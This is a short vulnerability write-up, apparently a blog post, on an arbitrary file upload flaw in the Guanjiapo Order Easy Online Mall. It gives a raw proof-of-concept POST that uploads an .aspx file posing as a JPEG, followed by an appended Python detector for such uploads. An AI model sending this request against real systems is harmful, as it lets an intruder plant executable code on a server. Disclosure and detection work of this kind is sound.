Guanjiapo Order Easy Online Mall SelectImage.aspx arbitrary file upload vulnerability
Vulnerability Description
Ren Woxing was the first to launch Guanjiapo, an integrated purchase, sales, inventory and financial software package for small and medium-sized enterprises.
Vulnerability Impact
Guanjiapo Order Easy Online Mall
Network surveying and mapping
Vulnerability reproduction
Login page
Verify POC
POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=532c7611457d40f4ae4cd9422973416b

--532c7611457d40f4ae4cd9422973416b
Content-Disposition: form-data; name="Filedata"; filename="TEST.aspx"
Content-Type: image/jpeg

<% Response.Write("Test"); %>
--532c7611457d40f4ae4cd9422973416b--
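A defender-side check for the request shown above, as an added example that is not part of the original page: it parses a captured upload to SelectImage.aspx and flags a file part whose extension is server-executable, whose extension disagrees with its declared image type, or whose body contains an ASP script delimiter. The extension lists, the function name and the Host value in the sample are assumptions made for this example.

```python
import os
from email import message_from_bytes, policy

UPLOAD_PATH = "/dialogtemplates/selectimage.aspx"
# Assumed deny list of extensions IIS/ASP.NET treats as executable or sensitive.
EXECUTABLE_EXT = {".aspx", ".ashx", ".asmx", ".asp", ".cshtml", ".config"}
IMAGE_EXT = {"image/jpeg": {".jpg", ".jpeg"}, "image/png": {".png"}, "image/gif": {".gif"}}

def inspect_upload(raw: bytes) -> list:
    """Return findings for one captured HTTP request; an empty list means nothing flagged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, headers = head.partition(b"\r\n")
    fields = request_line.decode("latin-1").split(" ")
    if len(fields) != 3 or fields[0] != "POST" or not fields[1].lower().startswith(UPLOAD_PATH):
        return []
    # HTTP headers plus a multipart body parse as a MIME document.
    msg = message_from_bytes(headers + b"\r\n\r\n" + body, policy=policy.default)
    findings = []
    for part in msg.iter_parts():
        name = part.get_filename()
        if not name:
            continue  # ordinary form field, not a file
        ext = os.path.splitext(name)[1].lower()
        ctype = part.get_content_type()
        data = part.get_payload(decode=True) or b""
        if ext in EXECUTABLE_EXT:
            findings.append(f"{name}: server-executable extension {ext}")
        if ctype in IMAGE_EXT and ext not in IMAGE_EXT[ctype]:
            findings.append(f"{name}: declared {ctype} but extension is {ext}")
        if b"<%" in data:
            findings.append(f"{name}: ASP script delimiter in file body")
    return findings

# Constructed sample: the request from this page with a placeholder Host header.
SAMPLE = b"\r\n".join([
    b"POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1",
    b"Host: shop.example.test",
    b"Content-Type: multipart/form-data; boundary=532c7611457d40f4ae4cd9422973416b",
    b"",
    b"--532c7611457d40f4ae4cd9422973416b",
    b'Content-Disposition: form-data; name="Filedata"; filename="TEST.aspx"',
    b"Content-Type: image/jpeg",
    b"",
    b'<% Response.Write("Test"); %>',
    b"--532c7611457d40f4ae4cd9422973416b--",
    b"",
])

if __name__ == "__main__":
    for finding in inspect_upload(SAMPLE):
        print(finding)
```

The same three checks, applied server-side before the file is written to disk, are what the upload handler itself is missing.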
This post is licensed under CC BY 4.0 by the author.